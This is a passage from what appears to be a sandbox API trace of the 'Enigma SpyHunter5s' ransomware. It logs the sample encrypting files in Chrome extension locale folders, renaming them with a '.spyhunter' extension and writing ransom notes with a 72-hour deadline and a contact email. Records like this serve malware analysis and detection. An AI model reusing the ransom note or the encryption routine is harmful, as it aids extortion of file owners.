hTemplateFile=0x0) returned 0xb0 [0159.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0159.478] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.478] GetProcessHeap () returned 0x2c0000 [0159.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.478] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9fc*=0x29f, lpOverlapped=0x0) returned 1 [0159.699] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.699] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9fc*=0x29f, lpOverlapped=0x0) returned 1 [0159.699] GetProcessHeap () returned 0x2c0000 [0159.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.699] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.700] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x270ea3c*, lpNumberOfBytesWritten=0x270e9fc*=0x4, lpOverlapped=0x0) returned 1 [0159.700] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9fc*=0x30, lpOverlapped=0x0) returned 1 [0159.700] CloseHandle (hObject=0xb0) returned 1 [0159.700] GetProcessHeap () returned 0x2c0000 [0159.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.700] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.spyhunter") returned 169 [0159.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0159.701] GetProcessHeap () returned 0x2c0000 [0159.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.701] GetProcessHeap () returned 0x2c0000 [0159.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.701] GetProcessHeap () returned 0x2c0000 [0159.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0159.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.702] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.702] WriteFile (in: hFile=0xb0, lpBuffer=0x270e973*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x270e973*, lpNumberOfBytesWritten=0x270ea9c*=0x127, lpOverlapped=0x0) returned 1 [0159.703] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.703] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea9c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.703] CloseHandle (hObject=0xb0) returned 1 [0159.703] GetProcessHeap () returned 0x2c0000 [0159.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06148 | out: hHeap=0x2c0000) returned 1 [0159.704] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea38 | out: pbBuffer=0x270ea38) returned 1 [0159.704] GetProcessHeap () returned 0x2c0000 [0159.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.704] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea30*=0x30) returned 1 [0159.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0159.704] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.704] GetProcessHeap () returned 0x2c0000 [0159.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.705] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9f4*=0x282, lpOverlapped=0x0) returned 1 [0159.745] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.746] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x270e9f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9f4*=0x282, lpOverlapped=0x0) returned 1 [0159.746] GetProcessHeap () returned 0x2c0000 [0159.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.746] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9f4, lpOverlapped=0x0 | out: lpBuffer=0x270ea34*, lpNumberOfBytesWritten=0x270e9f4*=0x4, lpOverlapped=0x0) returned 1 [0159.746] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9f4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9f4*=0x30, lpOverlapped=0x0) returned 1 [0159.746] CloseHandle (hObject=0xb0) returned 1 [0159.746] GetProcessHeap () returned 0x2c0000 [0159.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.746] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.spyhunter") returned 169 [0159.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0159.747] GetProcessHeap () returned 0x2c0000 [0159.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.748] GetProcessHeap () returned 0x2c0000 [0159.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.748] GetProcessHeap () returned 0x2c0000 [0159.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81110 | out: hHeap=0x2c0000) returned 1 [0159.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.749] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.749] WriteFile (in: hFile=0xb0, lpBuffer=0x270e96b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x270e96b*, lpNumberOfBytesWritten=0x270ea94*=0x127, lpOverlapped=0x0) returned 1 [0159.750] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.750] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea94*=0x2ac, lpOverlapped=0x0) returned 1 [0159.750] CloseHandle (hObject=0xb0) returned 1 [0159.750] GetProcessHeap () returned 0x2c0000 [0159.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c80 | out: hHeap=0x2c0000) returned 1 [0159.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea30 | out: pbBuffer=0x270ea30) returned 1 [0159.750] GetProcessHeap () returned 0x2c0000 [0159.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea28*=0x30) returned 1 [0159.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0159.751] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.751] GetProcessHeap () returned 0x2c0000 [0159.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.751] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9ec*=0x2ae, lpOverlapped=0x0) returned 1 [0159.826] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.826] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x270e9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9ec*=0x2ae, lpOverlapped=0x0) returned 1 [0159.826] GetProcessHeap () returned 0x2c0000 [0159.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.826] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.826] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9ec, lpOverlapped=0x0 | out: lpBuffer=0x270ea2c*, lpNumberOfBytesWritten=0x270e9ec*=0x4, lpOverlapped=0x0) returned 1 [0159.826] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9ec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9ec*=0x30, lpOverlapped=0x0) returned 1 [0159.827] CloseHandle (hObject=0xb0) returned 1 [0159.827] GetProcessHeap () returned 0x2c0000 [0159.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.827] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.spyhunter") returned 169 [0159.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0159.829] GetProcessHeap () returned 0x2c0000 [0159.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.829] GetProcessHeap () returned 0x2c0000 [0159.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.829] GetProcessHeap () returned 0x2c0000 [0159.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d560 | out: hHeap=0x2c0000) returned 1 [0159.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.830] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.830] WriteFile (in: hFile=0xb0, lpBuffer=0x270e963*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x270e963*, lpNumberOfBytesWritten=0x270ea8c*=0x127, lpOverlapped=0x0) returned 1 [0159.831] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.831] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea8c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.832] CloseHandle (hObject=0xb0) returned 1 [0159.832] GetProcessHeap () returned 0x2c0000 [0159.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b7e0 | out: hHeap=0x2c0000) returned 1 [0159.832] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea28 | out: pbBuffer=0x270ea28) returned 1 [0159.832] GetProcessHeap () returned 0x2c0000 [0159.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.832] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea20*=0x30) returned 1 [0159.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0159.834] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.834] GetProcessHeap () returned 0x2c0000 [0159.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.834] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9e4*=0x26e, lpOverlapped=0x0) returned 1 [0159.861] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.861] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x270e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9e4*=0x26e, lpOverlapped=0x0) returned 1 [0159.861] GetProcessHeap () returned 0x2c0000 [0159.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.861] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.861] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9e4, lpOverlapped=0x0 | out: lpBuffer=0x270ea24*, lpNumberOfBytesWritten=0x270e9e4*=0x4, lpOverlapped=0x0) returned 1 [0159.861] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9e4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9e4*=0x30, lpOverlapped=0x0) returned 1 [0159.861] CloseHandle (hObject=0xb0) returned 1 [0159.861] GetProcessHeap () returned 0x2c0000 [0159.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.862] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.spyhunter") returned 169 [0159.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 